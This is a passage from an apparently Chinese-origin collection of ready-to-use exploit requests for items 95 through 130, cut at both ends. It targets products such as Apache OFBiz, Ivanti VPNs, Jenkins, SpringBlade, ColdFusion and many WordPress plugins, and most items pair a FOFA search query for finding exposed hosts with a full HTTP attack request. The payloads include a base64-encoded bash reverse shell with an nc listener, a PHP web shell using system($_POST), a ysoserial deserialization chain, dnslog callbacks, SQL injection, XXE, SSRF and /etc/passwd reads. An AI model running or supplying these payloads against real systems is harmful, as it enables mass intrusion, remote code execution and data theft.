Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the uploaded file (cciytdzu.txt, the filename sent above):

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:1112
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response to the download request:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then visit /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (百绰) Smart s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The parameter sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file is reachable at http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123

After the user has been created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

